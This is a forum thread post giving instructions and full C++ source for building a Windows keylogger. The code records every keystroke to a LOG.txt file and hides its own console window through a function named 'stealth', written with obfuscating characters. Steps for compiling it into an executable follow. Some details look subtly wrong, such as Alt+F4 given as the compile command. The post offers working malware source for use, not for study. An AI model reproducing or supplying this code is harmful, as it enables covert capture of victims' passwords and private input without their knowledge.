What's new

Closed K3yl0g3r using c++

Status
Not open for further replies.

ISPRIKITEK

Forum Veteran
Joined
May 8, 2017
Posts
1,495
Reaction
504
Points
540
Age
23
For those of you that don't have access to PYTHON,here is another method to create A ********* USING C++
Firstly you will need to download DEV C++
STEP 1 : After downloading it run it and go to Create a New project file (File > New)
and paste the following code in it:
<b>
You do not have permission to view the full content of this post. Log in or register now.
using namespace std;
#include
#include
int Save (int key_stroke, char *file);
void s†éálth();
int main()
{
s†éálth();
char i;
while (1)
{
for(i = 8; i <= 190; i++)
{
if (GetAsyncKeyState(i) == -32767)
Save (i,"LOG.txt");
}
}
system ("PAUSE");
return 0;
}
/* *********************************** */
int Save (int key_stroke, char *file)
{
if ( (key_stroke == 1) || (key_stroke == 2) )
return 0;
FILE *OUTPUT_FILE;
OUTPUT_FILE = fopen(file, "a+");
cout << key_stroke << endl;
if (key_stroke == 8)
fprintf(OUTPUT_FILE, "%s",
"[BACKSPACE]");
else if (key_stroke == 13)
fprintf(OUTPUT_FILE, "%s", "\n");
else if (key_stroke == 32)
fprintf(OUTPUT_FILE, "%s", " ");
else if (key_stroke == VK_TAB)
fprintf(OUTPUT_FILE, "%s", "[TAB]");
else if (key_stroke == VK_SHIFT)
fprintf(OUTPUT_FILE, "%s", "[SHIFT]");
else if (key_stroke == VK_CONTROL)
fprintf(OUTPUT_FILE, "%s", "[CONTROL]");
else if (key_stroke == VK_ESCAPE)
fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");
else if (key_stroke == VK_END)
fprintf(OUTPUT_FILE, "%s", "[END]");
else if (key_stroke == VK_HOME)
fprintf(OUTPUT_FILE, "%s", "[HOME]");
else if (key_stroke == VK_LEFT)
fprintf(OUTPUT_FILE, "%s", "");
else if (key_stroke == VK_UP)
fprintf(OUTPUT_FILE, "%s", "[UP]");
else if (key_stroke == VK_RIGHT)
fprintf(OUTPUT_FILE, "%s", "");
else if (key_stroke == VK_DOWN)
fprintf(OUTPUT_FILE, "%s", "[DOWN]");
else if (key_stroke == 190 || key_stroke ==
110)
fprintf(OUTPUT_FILE, "%s", ".");
else
fprintf(OUTPUT_FILE, "%s", &key_stroke);
fclose (OUTPUT_FILE);
return 0;
}
/* *********************************** */
void s†éálth()
{
HWND s†éálth;
AllocConsole();
s†éálth = FindWindowA
("ConsoleWindowClass", NULL);
ShowWindow(s†éálth,0);
}
STEP 2 :Now compile the program(Alt +F4)
and make it to an executable server file(.exe)
STEP 3 : Now when you click that .exe file you
will be followed with an black screen
blinking then each of the keystrokes are
recorded to “LOG.txt’ at c directory
 
Status
Not open for further replies.

About this Thread

  • 5
    Replies
  • 461
    Views
  • 4
    Participants
Last reply from:
2wenty8

Online statistics

Members online
561
Guests online
4,856
Total visitors
5,417
Back
Top